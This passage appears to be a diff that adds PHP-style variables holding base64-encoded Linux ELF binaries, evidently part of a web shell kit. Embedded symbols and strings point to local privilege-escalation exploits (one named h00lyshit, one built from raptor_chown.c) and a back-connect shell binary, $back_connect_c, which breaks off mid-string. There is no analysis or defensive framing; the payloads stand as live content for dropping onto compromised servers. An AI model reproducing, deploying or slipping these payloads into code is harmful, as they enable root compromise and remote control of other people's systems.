+AAAAAAAAjwAAAAEAAAADAAAAAJgECAAIAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAAAgAA
+AAyYBAgMCAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQmAQIEAgAAMgAAAAFAAAA
+AAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JgECNgIAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8AAAAB
+AAAAAwAAAOCYBAjgCAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADomAQI6AgAAAQA
+AAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JgECOwIAAA0AAAAAAAAAAAAAAAEAAAABAAA
+AMAAAAAIAAAAAwAAACCZBAggCQAACAAAAAAAAAAAAAAABAAAAAAAAADFAAAAAQAAAAAAAAAAAAAA
+IAkAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMgJAADOAAAAAAAAAAAAAAAB
+AAAAAAAAAAEAAAACAAAAAAAAAAAAAADQDgAA0AQAABoAAAArAAAABAAAABAAAAAJAAAAAwAAAAAA
+AAAAAAAAoBMAANcCAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAA
+AAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAACQgQQIAAAAAAMABAAAAAAA
+YIIECAAAAAADAAUAAAAAAPiCBAgAAAAAAwAGAAAAAAAUgwQIAAAAAAMABwAAAAAARIMECAAAAAAD
+AAgAAAAAAFSDBAgAAAAAAwAJAAAAAACcgwQIAAAAAAMACgAAAAAAtIMECAAAAAADAAsAAAAAAFSE
+BAgAAAAAAwAMAAAAAADIhgQIAAAAAAMADQAAAAAAAIcECAAAAAADAA4AAAAAAACYBAgAAAAAAwAP
+AAAAAAAMmAQIAAAAAAMAEAAAAAAAEJgECAAAAAADABEAAAAAANiYBAgAAAAAAwASAAAAAADgmAQI
+AAAAAAMAEwAAAAAA6JgECAAAAAADABQAAAAAAOyYBAgAAAAAAwAVAAAAAAAgmQQIAAAAAAMAFgAA
+AAAAAAAAAAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAA
+AAADABoAAQAAAHiEBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAA2JgECAAAAAABABIAKgAA
+AOCYBAgAAAAAAQATADgAAADomAQIAAAAAAEAFABFAAAACJgECAAAAAABAA8ASQAAACSZBAgBAAAA
+AQAWAFUAAACchAQIAAAAAAIADABrAAAA2IQECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cAAADc
+mAQIAAAAAAEAEgCEAAAA5JgECAAAAAABABMAkQAAAAyYBAgAAAAAAQAQAJ8AAADomAQIAAAAAAEA
+FACrAAAApIYECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/9AAAAAAAAAA4AAAABIAAADhAAAAEJgE
+CAAAAAARABEA6gAAAACHBAgEAAAAEQAOAPEAAAAAAAAAyQEAABIAAAADAQAAAAAAABQAAAASAAAA
+FgEAAACYBAgAAAAAEALx/ycBAAAEmAQIAAAAABECDwA0AQAAYIYECEQAAAASAAwARAEAAAAAAAA0
+AAAAEgAAAGABAAAAAAAAZgAAABIAAAByAQAAnIMECAAAAAASAAoAeAEAACCZBAgEAAAAEQAWAIoB
+AABUhAQIAAAAABIADACRAQAAAJgECAAAAAAQAvH/pAEAABiGBAhIAAAAEgAMALQBAAAgmQQIAAAA
+ABAA8f/AAQAABIUECBEBAAASAAwAxQEAAAAAAADVAAAAEgAAAOIBAAAAmAQIAAAAABAC8f/zAQAA
+AJgECAAAAAAgAA8A/gEAAMiGBAgAAAAAEgANAAQCAAAAAAAAQwAAABIAAAAWAgAAAJgECAAAAAAQ
+AvH/KgIAAAAAAADLAAAAEgAAADoCAAAgmQQIAAAAABAA8f9BAgAA7JgECAAAAAARABUAVwIAACiZ
+BAgAAAAAEADx/1wCAAAAmAQIAAAAABAC8f9vAgAABIcECAQAAAARAA4AfgIAAAAAAAAkAAAAEgAA
+AJECAAAAmAQIAAAAABAADwCeAgAAAAAAAAAAAAAgAAAAsgIAAACYBAgAAAAAEALx/8gCAAAAAAAA
+AAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1Jf
+TElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4
+AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pD
+Ul9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAcmFwdG9yX2Nob3duLmMAY2hvd25AQEdMSUJD
+XzIuMQBfRFlOQU1JQwBfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZnByaW50ZkBAR0xJQkNfMi4w
+AF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfX2Vycm5vX2xv
+Y2F0aW9uQEBHTElCQ18yLjAAc3lzdGVtQEBHTElCQ18yLjAAX2luaXQAc3RkZXJyQEBHTElCQ18y
+LjAAX3N0YXJ0AF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQA
+bWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9lbmQAZGF0YV9z
+dGFydABfZmluaQBnZXRnaWRAQEdMSUJDXzIuMABfX3ByZWluaXRfYXJyYXlfZW5kAGV4aXRAQEdM
+SUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2FycmF5X3N0
+YXJ0AF9JT19zdGRpbl91c2VkAHNwcmludGZAQEdMSUJDXzIuMABfX2RhdGFfc3RhcnQAX0p2X1Jl
+Z2lzdGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A";
+
+$h00lyshit="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAgIcECDQAAADYEgAAAAAAADQAIAAHACgAGwAYAAYAAAA0
+AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA
+AAABAAAAAAAAAACABAgAgAQIbg4AAG4OAAAFAAAAABAAAAEAAAAAEAAAAJAECACQBAhYAQAAxAgA
+AAYAAAAAEAAAAgAAABAQAAAQkAQIEJAECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQI
+IAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1s
+aW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAdAAAADgAAAAAA
+AAAaAAAAAAAAAAkAAAARAAAAAQAAABAAAAATAAAAAwAAABsAAAALAAAAAAAAABkAAAAPAAAAHAAA
+AAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAA
+AAAAAAcAAAAAAAAAAAAAAAAAAAAKAAAACAAAAAwAAAASAAAADQAAABYAAAAXAAAAGAAAABQAAAAV
+AAAABgAAAAAAAAAAAAAAAAAAAAAAAAAhAAAAAAAAAAgAAAASAAAAYgAAAAAAAABGAAAAEgAAADUA
+AAAAAAAAyQEAABIAAABdAAAAAAAAAFAAAAASAAAAPAAAAAAAAAC+AAAAEgAAAEMAAAAAAAAANgAA
+ABIAAAAaAAAAAAAAAFcAAAASAAAASAAAAAAAAAA6AAAAEgAAACgAAAAAAAAASAAAABIAAAC2AAAA
+AAAAAC4AAAASAAAAEwAAAGCRBAgEAAAAEQAWAIQAAABkkQQIBAAAABEAFgALAAAAAAAAAHwAAAAS
+AAAAwgAAAAAAAAAhAQAAEgAAAHAAAAAAAAAAeQAAABIAAACfAAAAAAAAANUAAAASAAAATgAAAAAA
+AAAnAAAAEgAAAH0AAAAAAAAAKQAAABIAAAAuAAAAAAAAADcAAAASAAAANgAAAHuIBAgvAAAAEgAM
+ALEAAAAAAAAAfAAAABIAAACLAAAAAAAAAMsAAAASAAAAdQAAAAAAAADJAAAAEgAAAGkAAAAAAAAA
+QwAAABIAAACQAAAA6I0ECAQAAAARAA4AVQAAAAAAAAA8AAAAEgAAAHwAAAAAAAAAJAAAABIAAADL
+AAAAAAAAAAAAAAAgAAAAAGxpYmMuc28uNgB3YWl0cGlkAHN0ZG91dABleGVjdmUAZ2V0cGlkAHBy
+Y3RsAG1lbWNweQBwZXJyb3IAZmZsdXNoAG1tYXAAY2htb2QAc3RyY2F0AG1hZHZpc2UAZm9yawBz
+dHJkdXAAbWVtc2V0AG5pY2UAZ2V0Y3dkAHNwcmludGYAc3RkZXJyAGV4aXQAX0lPX3N0ZGluX3Vz
+ZWQAX19saWJjX3N0YXJ0X21haW4Ab3BlbgBzY2hlZF95aWVsZABfX2Z4c3RhdABfX2dtb25fc3Rh
+cnRfXwBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEA
+AgACAAIAAgABAAIAAgAAAAAAAQABAAEAAAAQAAAAAAAAABBpaQ0AAAIA2gAAAAAAAABUkQQIBhwA
+AGCRBAgFCwAAZJEECAUMAAD4kAQIBwEAAPyQBAgHAgAAAJEECAcDAAAEkQQIBwQAAAiRBAgHBQAA
+DJEECAcGAAAQkQQIBwcAABSRBAgHCAAAGJEECAcJAAAckQQIBwoAACCRBAgHDQAAJJEECAcOAAAo
+kQQIBw8AACyRBAgHEAAAMJEECAcRAAA0kQQIBxIAADiRBAgHEwAAPJEECAcVAABAkQQIBxYAAESR
+BAgHFwAASJEECAcYAABMkQQIBxoAAFCRBAgHGwAAVYnlg+wI6LEBAADoDAIAAOinBwAAycMA/zXw
+kAQI/yX0kAQIAAAAAP8l+JAECGgAAAAA6eD/////JfyQBAhoCAAAAOnQ/////yUAkQQIaBAAAADp
+wP////8lBJEECGgYAAAA6bD/////JQiRBAhoIAAAAOmg/////yUMkQQIaCgAAADpkP////8lEJEE
+CGgwAAAA6YD/////JRSRBAhoOAAAAOlw/////yUYkQQIaEAAAADpYP////8lHJEECGhIAAAA6VD/
+////JSCRBAhoUAAAAOlA/////yUkkQQIaFgAAADpMP////8lKJEECGhgAAAA6SD/////JSyRBAho
+aAAAAOkQ/////yUwkQQIaHAAAADpAP////8lNJEECGh4AAAA6fD+////JTiRBAhogAAAAOng/v//
+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
+AEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAA
+LnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5
+bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBs
+dAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3Rv
+cnMALmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAA
+AAAjAAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEE
+CEgBAADAAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAAiCBAgIAgAA0AEAAAUAAAABAAAA
+BAAAABAAAAA/AAAAAwAAAAIAAADYgwQI2AMAAOQAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28C
+AAAAvIQECLwEAAA6AAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAAPiEBAj4BAAAIAAAAAUA
+AAABAAAABAAAAAAAAABjAAAACQAAAAIAAAAYhQQIGAUAABgAAAAEAAAAAAAAAAQAAAAIAAAAbAAA
+AAkAAAACAAAAMIUECDAFAAC4AAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAOiFBAjoBQAA
+FwAAAAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAAAhgQIAAYAAIABAAAAAAAAAAAAAAQAAAAE
+AAAAewAAAAEAAAAGAAAAgIcECIAHAABIBgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiN
+BAjIDQAAGwAAAAAAAAAAAAAABAAAAAAAAACHAAAAAQAAAAIAAADkjQQI5A0AAIoAAAAAAAAAAAAA
+AAQAAAAAAAAAjwAAAAEAAAADAAAAAJAECAAQAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAA
+AgAAAAyQBAgMEAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQkAQIEBAAAMgAAAAF
+AAAAAAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JAECNgQAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8A
+AAABAAAAAwAAAOCQBAjgEAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADokAQI6BAA
+AAQAAAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JAECOwQAABsAAAAAAAAAAAAAAAEAAAA
+BAAAAMAAAAAIAAAAAwAAAGCRBAhgEQAAZAcAAAAAAAAAAAAAIAAAAAAAAADFAAAAAQAAAAAAAAAA
+AAAAYBEAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAgSAADOAAAAAAAAAAAA
+AAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAQFwAAoAYAABoAAAAzAAAABAAAABAAAAAJAAAAAwAA
+AAAAAAAAAAAAsB0AABwEAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQI
+AAAAAAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAAAIggQIAAAAAAMABAAA
+AAAA2IMECAAAAAADAAUAAAAAALyEBAgAAAAAAwAGAAAAAAD4hAQIAAAAAAMABwAAAAAAGIUECAAA
+AAADAAgAAAAAADCFBAgAAAAAAwAJAAAAAADohQQIAAAAAAMACgAAAAAAAIYECAAAAAADAAsAAAAA
+AICHBAgAAAAAAwAMAAAAAADIjQQIAAAAAAMADQAAAAAA5I0ECAAAAAADAA4AAAAAAACQBAgAAAAA
+AwAPAAAAAAAMkAQIAAAAAAMAEAAAAAAAEJAECAAAAAADABEAAAAAANiQBAgAAAAAAwASAAAAAADg
+kAQIAAAAAAMAEwAAAAAA6JAECAAAAAADABQAAAAAAOyQBAgAAAAAAwAVAAAAAABgkQQIAAAAAAMA
+FgAAAAAAAAAAAAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAA
+AAAAAAADABoAAQAAAKSHBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAA2JAECAAAAAABABIA
+KgAAAOCQBAgAAAAAAQATADgAAADokAQIAAAAAAEAFABFAAAACJAECAAAAAABAA8ASQAAAGiRBAgB
+AAAAAQAWAFUAAADIhwQIAAAAAAIADABrAAAABIgECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cA
+AADckAQIAAAAAAEAEgCEAAAA5JAECAAAAAABABMAkQAAAAyQBAgAAAAAAQAQAJ8AAADokAQIAAAA
+AAEAFACrAAAApI0ECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/80AAAByiAQIAAAAAAAADADRAAAA
+YogECAAAAAAAAAwA1QAAAMCYBAgEAAAAAQAWANcAAADAlwQIAAEAAAEAFgDZAAAAoJEECAAEAAAB
+ABYA2wAAAKCVBAgQAAAAAQAWAN0AAACAkQQIIAAAAAEAFgDgAAAAwJUECAACAAABABYA4gAAAAAA
+AAAIAAAAEgAAAPQAAAAQkAQIAAAAABEAEQD9AAAAAAAAAEYAAAASAAAADwEAAOSNBAgEAAAAEQAO
+ABYBAAAAAAAAyQEAABIAAAAoAQAAAAAAAFAAAAASAAAAOAEAAAAAAAC+AAAAEgAAAEoBAAAAkAQI
+AAAAABAC8f9bAQAABJAECAAAAAARAg8AaAEAAAAAAAA2AAAAEgAAAHgBAAA8jQQIRAAAABIADACI
+AQAAAAAAAFcAAAASAAAAmgEAAAAAAAA6AAAAEgAAAKsBAADohQQIAAAAABIACgCxAQAAAAAAAEgA
+AAASAAAAwgEAAAAAAAAuAAAAEgAAANkBAACAjQQIIgAAACICDADfAQAAYJEECAQAAAARABYA8QEA
+AGSRBAgEAAAAEQAWAAMCAAAAAAAAfAAAABIAAAAWAgAAgIcECAAAAAASAAwAHQIAAAAAAAAhAQAA
+EgAAADECAAAAAAAAeQAAABIAAABBAgAAAJAECAAAAAAQAvH/VAIAAPSMBAhIAAAAEgAMAGQCAABY
+kQQIAAAAABAA8f9wAgAAtYoECD0CAAASAAwAdQIAAAAAAADVAAAAEgAAAJICAAAAkAQIAAAAABAC
+8f+jAgAAAAAAACcAAAASAAAAtQIAAACQBAgAAAAAIAAPAMACAAAAAAAAKQAAABIAAADSAgAAyI0E
+CAAAAAASAA0A2AIAAAAAAAA3AAAAEgAAAOoCAAB7iAQILwAAABIADADwAgAAAJAECAAAAAAQAvH/
+BAMAADCIBAgAAAAAEAAMAA0DAAAAAAAAfAAAABIAAAAdAwAAAAAAAMsAAAASAAAALQMAAFiRBAgA
+AAAAEADx/zQDAADskAQIAAAAABEAFQBKAwAAxJgECAAAAAAQAPH/TwMAAAAAAADJAAAAEgAAAGED
+AAAAAAAAQwAAABIAAABzAwAAeogECAAAAAAQAAwAfgMAAACQBAgAAAAAEALx/5EDAACAjQQIIgAA
+ABICDACZAwAA6I0ECAQAAAARAA4AqAMAAAAAAAA8AAAAEgAAALsDAAAAAAAAJAAAABIAAADOAwAA
+AJAECAAAAAAQAA8A2wMAAAAAAAAAAAAAIAAAAO8DAACqiAQICwIAABIADAD3AwAAAJAECAAAAAAQ
+AvH/DQQAAAAAAAAAAAAAIAAAAABjYWxsX2dtb25fc3RhcnQAY3J0c3R1ZmYuYwBfX0NUT1JfTElT
+VF9fAF9fRFRPUl9MSVNUX18AX19KQ1JfTElTVF9fAHAuMABjb21wbGV0ZWQuMQBfX2RvX2dsb2Jh
+bF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRFRPUl9FTkRfXwBfX0ZSQU1F
+X0VORF9fAF9fSkNSX0VORF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABoMDBseXNoaXQuYwBjbWQA
+YXJnAGMAdABlAGEAZXgAYgBnZXRwaWRAQEdMSUJDXzIuMABfRFlOQU1JQwBzdHJkdXBAQEdMSUJD
+XzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAGZmbHVzaEBAR0xJ
+QkNfMi4wAF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAG1tYXBAQEdMSUJDXzIuMABfX2xp
+YmNfY3N1X2ZpbmkAZXhlY3ZlQEBHTElCQ18yLjAAY2htb2RAQEdMSUJDXzIuMABfaW5pdABwcmN0
+bEBAR0xJQkNfMi4wAHNjaGVkX3lpZWxkQEBHTElCQ18yLjAAZnN0YXQAc3Rkb3V0QEBHTElCQ18y
+LjAAc3RkZXJyQEBHTElCQ18yLjAAd2FpdHBpZEBAR0xJQkNfMi4wAF9zdGFydABfX2Z4c3RhdEBA
+R0xJQkNfMi4wAG5pY2VAQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9p
+bml0AF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRf
+YXJyYXlfZW5kAHN0cmNhdEBAR0xJQkNfMi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAA
+X2ZpbmkAbWVtY3B5QEBHTElCQ18yLjAAZXJyb3IAX19wcmVpbml0X2FycmF5X2VuZABfX2V4Y29k
+ZQBvcGVuQEBHTElCQ18yLjAAZXhpdEBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9U
+QUJMRV8AX2VuZABnZXRjd2RAQEdMSUJDXzIuMABtZW1zZXRAQEdMSUJDXzIuMABfX2V4Y29kZV9l
+AF9faW5pdF9hcnJheV9zdGFydABfX2ZzdGF0AF9JT19zdGRpbl91c2VkAG1hZHZpc2VAQEdMSUJD
+XzIuMABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0AF9Kdl9SZWdpc3RlckNsYXNzZXMA
+ZXhwbG9pdABfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A";
+
+
+$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAA